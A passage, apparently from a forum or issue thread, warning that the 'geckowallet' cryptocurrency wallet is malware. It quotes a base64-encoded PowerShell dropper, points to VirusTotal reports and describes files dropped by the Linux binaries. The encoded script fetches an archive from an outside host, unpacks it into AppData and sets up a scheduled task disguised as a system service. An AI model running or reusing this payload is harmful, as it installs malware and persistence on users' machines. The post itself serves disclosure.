9ACAAIgBGAHUAbgBjAHQAaQBvAG4AIABEAGIAbABRAHUAbwB0AGUAKABTAHQAcgApACIAOwAkAHQAZQB4AHQAMgA3ACAAPQAgACIARABiAGwAUQB1AG8AdABlACAAPQAgAEMAaAByACgAMwA0ACkAIAAmACAAUwB0AHIAIAAmACAAQwBoAHIAKAAzADQAKQAiADsAJAB0AGUAeAB0ADIAOAAgAD0AIAAiAEUAbgBkACAARgB1AG4AYwB0AGkAbwBuACIAOwBlAGMAaABvACAAJAB0AGUAeAB0ACAAJAB0AGUAeAB0ADIAIAAkAHQAZQB4AHQAMwAgACQAdABlAHgAdAA0ACAAJAB0AGUAeAB0ADUAIAAkAHQAZQB4AHQANgAgACQAdABlAHgAdAA3ACAAJAB0AGUAeAB0ADgAIAAkAHQAZQB4AHQAOQAgACQAdABlAHgAdAAxADAAIAAkAHQAZQB4AHQAMQAxACAAJAB0AGUAeAB0ADEAMgAgACQAdABlAHgAdAAxADMAIAAkAHQAZQB4AHQAMQA0ACAAJAB0AGUAeAB0ADEANQAgACQAdABlAHgAdAAxADYAIAAkAHQAZQB4AHQAMQA3ACAAJAB0AGUAeAB0ADEAOAAgACQAdABlAHgAdAAxADkAIAAkAHQAZQB4AHQAMgAwACAAJAB0AGUAeAB0ADIAMQAgACQAdABlAHgAdAAyADIAIAAkAHQAZQB4AHQAMgAzACAAJAB0AGUAeAB0ADIANAAgACQAdABlAHgAdAAyADUAIAAkAHQAZQB4AHQAMgA2ACAAJAB0AGUAeAB0ADIANwAgACQAdABlAHgAdAAyADgAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABhAGQAZABQAGEAdABoADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHUAcABkAGEAdABlAC4AYQBpAHIAZAByAG8AcABlAHIALgBuAGUAdAAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AegBpAHAAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXABiAG8AbwB0AHMAdAByAGEAcAAuAHoAaQBwACIAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYgBvAG8AdABzAHQAcgBhAHAALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgAgAC0ARgBvAHIAYwBlADsAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AcwBjACAAbQBpAG4AdQB0AGUAIAAvAG0AbwAgADEAMAAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AdAByACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALwBmACAAfQAgAGUAbABzAGUAIAB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAXABqAEwAaABlAHIAWQB1AC4AdgBiAHMAIgA7AGIAcgBlAGEAawB9AH0A | base64 -d
https://www.virustotal.com/gui/file/f41649a4cb6f167c66ef4e2252c3a50f2b3b8a8d6818580ca0e7d6dec2142ac9/behavior
https://www.virustotal.com/gui/file/7d8bb86d079e81b143f82ead0165f92170795228c06fcf1317e6d99972d90256/behavior
Not only is the windows wallet malicious, so are linux precompiled binares that drop files in /var/lib/fwupd/gnupg/ and /root/.dbus/session-bus/ and then try to set auto execute using /usr/bin/dbus-launch dbus-launch --autolaunch a39eb3ed78b7401fb6809ed0c562a5b1 --binary-syntax --close-stderr
So far we have multiple people that have confirmed the files dropped in the exact position the powershell says they would after using geckowallet.
Also you gotta be out of your mind if you want me to install a virus infected wallet to show video proof.